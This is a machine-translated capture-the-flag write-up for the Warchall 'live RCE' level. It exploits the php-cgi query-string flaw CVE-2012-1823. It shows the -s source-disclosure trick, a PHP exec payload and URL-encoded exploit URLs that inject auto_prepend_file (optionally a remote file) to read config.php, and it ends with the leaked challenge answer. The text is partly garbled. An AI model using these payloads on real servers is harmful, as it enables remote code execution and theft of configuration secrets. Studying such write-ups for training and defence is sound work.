Warchall:live RCE

The specific vulnerability is: cve-2012-1823 (php-cgi RCE)

The behavior of the corresponding php-cgi parameter is run after the add-in parameter of the address

such as Index.php?-s

Relative to/usr/bin/php53-cgi/php-cgi-f index.php-s

php-cgi--help as follows:

usage:php-cgi [-Q] [-h] [-S] [-v] [-i] [-f <file>] PHP-cgi <file>[args ...] -a Run interactively-B <address:port>|<port> Bind Path forexternal FASTCGI Server mode-C do not chdir to the script'S Directory-C <path>|<file> Look forInifile inchThis directory-N No php.inifileWould be used-D Foo[=bar] Define INI entry Foo with value'Bar'-E Generate Extended information fordebugger/Profiler-F <file> Parse <file. Implies '-Q'-h This help-I PHP information-l Syntax Check only (lint)-M Show compiledinchModules-Q quiet-mode.  Suppress HTTP Header output. -s Display colour syntax highlighted source. -v Version number-WDisplay source with stripped comments and whitespace. -Z <file> Load Zend Extension <file>. -T <count> Measure execution TimeOf the script repeated <count> times.

Http://rce.warchall.net/?-s

See the source code of index.php

基中有一个语句是：require ‘../config.php‘;

Then we'll find a way to read this file.

The absolute path to the index.php is:/home/level/20_live_rce/www/index.php
.. The absolute path to the/config.php is:/home/level/20_live_rce/config.ph
Try to output config.php source code.

php-cgi
Parameter: D Foo[=bar]     'bar'
-dallow_url_include=on
dauto_prepend_file=/tmp/2.php
Creating a 2.php content in/tmp is:

<? PHP exec ("cat/home/level/20_live_rce/config.php",$out); Print_r ($out);? >

Submit Address: (address, this/TMP/2 can be changed in their own service http://xxx.xxx/1.txt)

Http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n

UrlEncode is:

Http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n

Get.. Source code for/config.php:

Array Define (' Icanhazrce ', ' stronggard_6_3 '); [return  icanhazrce; [

Warchall:live RCE